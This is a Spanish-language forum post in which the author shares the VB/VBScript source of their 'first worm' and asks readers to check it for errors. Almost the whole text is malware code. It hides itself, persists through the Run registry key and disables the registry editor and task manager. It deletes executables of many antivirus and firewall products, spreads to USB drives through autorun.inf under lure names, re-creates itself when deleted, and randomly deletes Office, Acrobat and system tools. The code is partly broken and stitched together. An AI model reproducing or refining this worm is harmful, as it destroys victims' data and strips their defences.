Buenos días a todos. Leyendo mini-manuales de VB en esta página web y en otras semejantes se me ocurrió probar a intentar crear mi primer gusano (por supuesto, basándome en código prefabricado de los manuales, sobre todo de uno de Hendrix, y usando parte del código del "michelle", de octalh. Bueno... es mi primer gusano, a sí que supongo que algo mal tendrá. Échenle un ojo y si ven algún error háganmelo saber ¿ok? :
App.Taskvisible = False
FileCopy App.Path & "\" & App.VBSname & ".vbs C:\Windows\System\services.vbs"
Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services.vbs d/ C:\WINDOWS\System\services.vbs" 'el pequeñín ya está en el registro
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
Kill "C:\WINDOWS\System32\shutdown.exe"
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"
Private Sub Form_Load()
Form1.Visible = False
MsgBox ("Runtime Error 492. El archivo está dañado o corrupto. Por favor, consiga otra copia."), vbCritical, "Fallo en la aplicación ""
End Sub
Open "C:\Windows\System32\winlog.bat" For Output As #1
Print #1, "@echo off"
Print #1, "If exist E:\ (Copy /y C:\WINDOWS\System\services.vbs E:\services.vbs)"
Print #1, "If exist F:\ (Copy /y C:\WINDOWS\System\services.vbs F:\services.vbs)"
Print #1, "If exist G:\ (Copy /y C:\WINDOWS\System\services.vbs G:\services.vbs)"
Print #1, "exit"
Close #1
Shell ("C:\Windows\System32\Winlog.bat"), vbHide
Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
Kill "C:\Archivos de programa\ESET\nod32.exe"
Kill "C:\Archivos de programa\ESET\nod32kui.exe"
Kill "C:\Archivos de programa\ESET\nod32krn.exe"
Kill "C:\Archivos de programa\ESET\nod32krr.dll"
Kill "C:\Archivos de programa\ESET\nod32ari.dll"
Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
Kill "C:\Archivos de programa\AntiVir\avscan.exe"
Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
Kill "C:\Archivos de programa\AntiVir\avguard.exe"
Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
Kill "C:\Archivos de programa\ATS2\ats.exe"
Kill "C:\Archivos de programa\ATS2\d1.exe"
Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"
'otra opción de copiado es la siguiente:
'FileCopy App.Path & App.VBSName & ".vbs", "E:\services.vbs"
'Ahora vamos a marcar nuestro dominio
Set Worm = CreateObject("WScript.Shell")
Worm.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.elhacker.net"
Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"
Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"
'comprimiendo el wormet
Shell Winzip & "-a C:\porno.zip" & "C:\Windows\System\services.vbs" 'comprimir el virus
'para extraer:
'Shell Winzip & "-e C:\porno.zip" &"C:\"
'infectando RARs:
Shell winrar & "a C:\confidencial.zip C:\WINDOWS\System\services.vbs"
Shell winrar & "a C:\passwords.rar C:\WINDOWS\System\services.vbs"
Sub Main() 'motor de búsqueda en infección:
On Error Resume Next
If HayExcel Or HayWord Then
Fso.CopyFile MiNombreVBS, "F:\Abril Lavigne Desnuda.jpeg.vbs"
Fso.CopyFile DirWin & "Web\Folder.htt", "F:\Folder.htt", True
Fso.CopyFile DirWin & "Web\Desktop.ini", "F:\Desktop.ini", True
SetAttr "F:\Abril Lavigne Desnuda.jpeg", vbReadOnly
SetAttr "F:\Desktop.ini", vbHidden
SetAttr "F:\Folder.htt", vbHidden
End If
End Sub
'infectando archivos de excel:
Function HayExcel() As Boolean
Dim ExcelObj As Object
On Error GoTo NoExcel
Set ExcelObj = GetObject(, "Excel.Application")
If ExcelObj.ActiveWorkbook.Path = "F:\" Then
HayExcel = True
Exit Function
End If
NoExcel:
HayExcel = False
End Function
Sub Main() 'Ahora un pequeño PayLoad
If (Month(Now) = 6 or Month(Now) > 6) And (Day(Now) = 13 or Day(Now) < 13) Then
MsgBox "Ándate con ojo porque dije que vendría y he venido", vbCritical, "Marca del Corruptor"
MsgBox "Estás en mis manos... ¿quieres verlo?", vbExclamation, "Marca del Corruptor"
MsgBox "DAME EL PaWeRrR!!!", vbExclamation, "Marca del Corruptor"
MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
End Sub
Sub Main()
Randomize
Num = Rnd
If Num = 0 Then
MsgBox "Has tenido suerte, mi amo ha querido que te respete. Dale gracias", vbExclamation, "El Perro Fiero de San Pancracio"
End If
If Num = 1 Then
MsgBox "Algo has hecho para merecer la ira de mi amo. Hoy la suerte te ha abandonado.", vbExclamation, "El Perro Fiero"
Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
Kill "C:\WINDOWS\System32\taskmgr.exe" 'esto borra el administrador de tareas
Kill "C:\WINDOWS\Taskman.EXE" 'por si acaso, que no me fío
Kill "C:\WINDOWS\System32\cmd.exe" 'esto elimina la opción de usar el MS-Dos
Kill "C:\WINDOWS\regedit.exe" 'esto borra el editor del registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
Kill "C:\WINDOWS\System32\command.com" 'esto borra la otra opción de usar el MS-Dos
End If
End Sub
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
Bueno, de hecho son dos códigos:
'@echo off by Eliphas & Nehekara. Añoranza del Valhalla.
'por la gloria del Larisel IV, ahora y siempre
'Especiales agradecimientos a Octalh y a Hendrix
App.Taskvisible = False
MsgBox "Por fin nos hemos encontrado tú y yo.", vbExclamation, "Cherubael dice:"
MsgBox "Sabrías que vendría y he venido.", vbExclamation, "Cherubael dice:"
MsgBox "Nehekara no perdona los agravios recibidos.", vbExclamation, "Cherubael dice:"
MsgBox "A sí que ahora afronta las consecuencias.", vbExclamation, "Cherubael dice:"
MsgBox "Quod Erat Demostrandum...", vbExclamation, "Cherubael dice:"
MsgBox "Todas las almas claman por su salvación.", vbExclamation, "Cherubael dice:"
MsgBox "DAME EL PaWeRrR!!!", vbCritical, "Cherubael dice:"
Sub Main()
On Error Resume Next
If Month(Now) = 12 And Day(Now) = 17 Then
MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
End Sub
Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winlogon.exe d/ C:\WINDOWS\System\winlogon.exe" 'el pequeñín ya está en el registro
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
Kill "C:\WINDOWS\System32\shutdown.exe"
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"
Sub Main() 'Dejando nuestra marca
On Error Resume Next
Set Cherubael = CreateObject("WScript.Shell")
Cherubael.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.CherubaeL.com.ar"
Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"
Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"
End Sub
Sub Main()
On Error Resume Next
Randomize
Num = Rnd
If Num = 0 Then
MsgBox "A pesar de todo, voy a apiadarme de tí. SOnríe, eres libre.", vbExclamation, "Cherubael dice:"
End If
If Num = 1 Then
MsgBox "Lo siento, pero debo cumplir mis órdenes. Hoy la suerte te ha abandonado.", vbExclamation, "Cherubael dice:"
Kill "C:\WINDOWS\System32\taskmgr.exe"
Kill "C:\WINDOWS\Taskman.EXE"
Kill "C:\WINDOWS\System32\cmd.exe"
Kill "C:\WINDOWS\regedit.exe"
Kill "C:\WINDOWS\System32\wscui.cpl"
Kill "C:\WINDOWS\System32\command.com"
Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE" 'hala!! a tomar por culo el office...
Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
End If
End Sub
'[ MODELO DE OBJETOS ]
Set fso = CreateObject("Scripting.FileSystemObject") ' ARCHIVOS
Set WshShell = wscript.CreateObject("WScript.Shell") ' REGISTRO
'[ CONSTANTES ]
GUSANETname = wscript.ScriptName ' Indicamos que el nombre del GUSANET sera
' el que tenga en ese momento el archivo actual.
GUSANET = "GUSANET.vbs"
'Nombre del exe que tendra el GUSANET en el sistema
GUSANETpatch = fso.GetSpecialFolder(1) & "\" & GUSANET
'Indicamos el directorio donde se copiara el GUSANET, si utilizamos
'la funcion specialfolder podemos indicar el copiado a la carpeta del sistema (1)
'sin importar donde se encuentre.
autorun = fso.GetSpecialFolder(1) & "\autorun.txt"
'lo mismo que en GUSANETpatch pero para el autorrun.
GUSANETusb = ":\proyecto.exe" ' Nombre que tendra el GUSANET en el medio extraible
autorunusb = ":\autorun.inf" ' Nombre que tendra el autorun en el medio extraible
Const HKEY_LOCAL_MACHINE = &H80000002 'constante para modificar registro mas adelante
'[ CHEQUEO DE INFECCION ]
If Not infeccion(GUSANET) Then
copiar GUSANETname, GUSANETpatch
End If
' + INFECTAR REGISTRO DE WINDOWS +
If Not keyexist("GUSANET", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\") Then
crearentradareg()
'Si no existe la llave en el registro llamada GUSANET entonces la crea, con esto aseguramos
'el arranque del GUSANET con cada inicio del sistema.
'Subproceso que se encarga crear un archivo y escribir datos en el
'en este caso le indicamos que cree un archivo con la constante autorun
'que definimos desde el principio
Sub makeautorun()
On Error Resume Next
Set mkaut = fso.createtextfile(autorun, True) 'creamos un archivo con el nombre de
mkaut.WriteLine "[AUTORUN]" 'la constante autorun
mkaut.WriteLine "open=" & GUSANETusb 'constante del nombre del ejecutable.
mkaut.WriteLine "shell\1=abrir"
mkaut.WriteLine "shell\1\Command=" & GUSANETusb
mkaut.WriteLine "shell\2\=explorar"
mkaut.WriteLine "shell\2\Command=" & GUSANETusb
mkaut.WriteLine "shellexecute=" & GUSANETusb
mkaut.Close
End Sub
'aqui creamos el autorun que sirve para ejecutar el GUSANET cuando el pardillo haga doble click
'en el icono de la unidad extraible
'subproceso que se encarga de añadir atributos de oculto, sistema y solo lectura
'a cada archivo que compone al GUSANET
Sub makeatributos()
On Error Resume Next
Dim archivosGUSANET(1) 'array archivosGUSANET que dentro de el contiene al GUSANET y su autorun
archivosGUSANET(0) = GUSANETpatch
archivosGUSANET(1) = autorun
For Each file In archivosGUSANET ' por cada archivo dentro del array archivosGUSANET
Set wormcontent = fso.GetFile(file) 'tomalos y
wormcontent.Attributes = 7 'agregales atributos
Next
End Sub
'Funcion que se encarga de verificar que exista una llave en el registro
Function keyexist(keyname, keyPath, regCategory)
On Error Resume Next
retVal = False
strComputer = "." 'inicamos en cualquier computadora
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv") 'se crea un objeto
oReg.EnumKey regCategory, keyPath, arrSubKeys 'partes de la clave del registro
For Each subkey In arrSubKeys
If keyname = subkey Then
retVal = True
Exit For
End If
Next
keyExists = retVal
End Function
'esta funcion basicamente se encarga de verificar que existan los valores que introduzcamos
'en ella que son keyname, keypath y regcategory, de esa manera comprobamos que exista
'cualquier llave en el registro con solo usar la funcion keyexist y el valor de nuestra
'llave a verficar
'Subproceso que se encarga de crear la llave en el registro
Private Sub crearentradareg()
On Error Resume Next
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GUSANET", _
GUSANETpatch, "REG_SZ"
End Sub
'Subproceso que se encarga de copiar al GUSANET a una unidad extraible.
Private Sub infekusb()
On Error Resume Next
Const DriveTypeRemovable = 1 ' indicamos medio extraible
Do ' inicia loop infinito
Set oFS = wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los drivers
For Each Drive In oDrives 'por cada driver
If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
If fso.fileexists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
Set cFile = fso.GetFile(Drive.DriveLetter + autorunusb) 'tomalo y
cFile.Attributes = 0 ' quitale los atributos
fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True 'despues copialo
Else ' de lo contrario
fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True ' copialo
End If
fso.CopyFile GUSANETpatch, Drive.DriveLetter & GUSANETusb, True ' copia el GUSANET a la unidad
End If
End If
Next
Loop
End Sub
Sub Main()
On Error Resume Next
Kill "C:\Archivos de programa\ESET\nod32.exe"
Kill "C:\Archivos de programa\ESET\nod32kui.exe"
Kill "C:\Archivos de programa\ESET\nod32krn.exe"
Kill "C:\Archivos de programa\ESET\nod32krr.dll"
Kill "C:\Archivos de programa\ESET\nod32ari.dll"
Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
Kill "C:\Archivos de programa\AntiVir\avscan.exe"
Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
Kill "C:\Archivos de programa\AntiVir\avguard.exe"
Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
